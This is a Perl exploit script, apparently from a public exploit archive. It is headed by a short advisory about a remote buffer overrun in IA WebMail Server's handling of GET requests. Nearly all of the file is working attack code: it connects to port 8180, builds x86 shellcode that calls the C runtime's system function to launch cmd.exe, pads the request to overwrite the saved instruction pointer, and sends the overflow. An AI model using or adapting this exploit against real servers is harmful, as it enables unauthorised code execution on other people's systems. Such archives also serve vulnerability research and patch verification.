60 lines
No EOL
1.8 KiB
Perl
Executable file
60 lines
No EOL
1.8 KiB
Perl
Executable file
source: https://www.securityfocus.com/bid/8965/info
|
|
|
|
IA WebMail Server is said to be prone to a remote buffer overrun that could allow an attacker to execute arbitrary code. The problem occurs due to insufficient bounds checking when handling GET requests. As a result, an attacker may be capable of overrunning the bounds of an internal memory buffer and effectively control the flow of execution.
|
|
|
|
#!/usr/bin/perl
|
|
use IO::Socket;
|
|
unless (@ARGV == 1) { die "usage: $0 host ..." }
|
|
$host = shift(@ARGV);
|
|
$remote = IO::Socket::INET->new( Proto => "tcp",
|
|
PeerAddr => $host,
|
|
PeerPort => "8180",
|
|
);
|
|
unless ($remote) { die "cannot connect to http daemon on $host" }
|
|
|
|
$remote->autoflush(1);
|
|
|
|
$shellcode = join ("",
|
|
"\x90", # - NOP
|
|
"\xCC", # - INT3
|
|
"\x90", # - NOP
|
|
"\x90", # - NOP
|
|
"\x90", # - NOP
|
|
"\x90", # - NOP
|
|
"\x8B\xEC", # - MOV EBP, ESP
|
|
"\x55", # - PUSH EBP
|
|
"\x8B\xEC", # - MOV EBP, ESP
|
|
"\x33\xFF", # - XOR EDI, EDI
|
|
"\x57", # - PUSH EDI
|
|
"\x83\xEC\x04", # 0 SUB ESP, 4
|
|
"\xC6\x45\xF8\x63", # - MOV BYTE PTR SS:[EBP-8],63h
|
|
"\xC6\x45\xF9\x6D", # - MOV BYTE PTR SS:[EBP-7],6Dh
|
|
"\xC6\x45\xFA\x64", # - MOV BYTE PTR SS:[EBP-6],64h
|
|
"\xC6\x45\xFB\x2E", # - MOV BYTE PTR SS:[EBP-5],2Eh
|
|
"\xC6\x45\xFC\x65", # - MOV BYTE PTR SS:[EBP-4],65h
|
|
"\xC6\x45\xFD\x78", # - MOV BYTE PTR SS:[EBP-3],78h
|
|
"\xC6\x45\xFE\x65", # - MOV BYTE PTR SS:[EBP-2],65h
|
|
"\xB8\xC3\xAF\x01\x78", # - MOV EAX, MSVCRT.system
|
|
"\x50", # - PUSH EAX
|
|
"\x8D\x45\xF8", # - LEA EAX, DWORD PTR SS:[EBP-8]
|
|
"\x50", # - PUSH EAX
|
|
"\xFF\x55\xF4", # - CALL DWORD PTR SS:[EBP-C]
|
|
"\x5F" # - POP EDI
|
|
);
|
|
|
|
$eip = "\x4c\xf8\x12";
|
|
|
|
#0012f84C
|
|
|
|
#$eip = "AAAA";
|
|
$request = join ("", "GET /", $shellcode, "A"x(1040-length($shellcode)),
|
|
$eip, " HTTP/1.1\r
|
|
Host: $host\r
|
|
Connection: close\r
|
|
\r
|
|
\r\n");
|
|
|
|
print $remote $request;
|
|
sleep(1);
|
|
|
|
close $remote; |